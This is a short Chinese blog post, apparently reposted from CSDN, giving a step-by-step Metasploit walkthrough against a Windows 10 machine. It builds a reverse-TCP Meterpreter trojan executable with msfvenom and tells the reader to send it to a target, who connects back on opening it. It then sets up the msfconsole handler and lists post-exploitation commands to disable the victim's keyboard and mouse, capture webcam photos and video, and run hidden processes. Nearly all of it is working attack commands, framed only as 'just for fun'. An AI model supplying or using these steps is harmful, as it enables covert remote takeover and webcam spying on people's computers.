kali渗透测试win10

通过msfvenom生成木马

msfvenom -p windows/meterpreter/reverse_tcp lhost=自己地址 lport=端口号 -f exe x>XX.exe

把木马传过去,点开就会往自己开放的ip和端口发送一个tcp链接

在kali中

msfconsole

msf > use exploit/multi/handler
 
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf exploit(multi/handler) > set lhost 172.16.4.3        #设置本地ip

lhost => 172.16.4.3

msf exploit(multi/handler) > set lport 44444             #设置本地端口

lport => 44444

msf exploit(multi/handler) > exploit 

[*] Started reverse TCP handler on 172.16.4.3:44444 

tcp链接以后可以使用以下功能

uictl开关键盘/鼠标
uictl [enable/disable] [keyboard/mouse/all]  #开启或禁止键盘/鼠标
uictl disable mouse  #禁用鼠标
uictl disable keyboard  #禁用键盘




webcam摄像头命令
webcam_list  #查看摄像头
webcam_snap   #通过摄像头拍照
webcam_stream   #通过摄像头开启视频



execute执行文件
execute #在目标机中执行文件
execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互

只列出一部分详细参见下面链接

https://xz.aliyun.com/t/2536

咳咳。。。。玩玩就好

猜你喜欢

转载自blog.csdn.net/weixin_38280090/article/details/83511530
今日推荐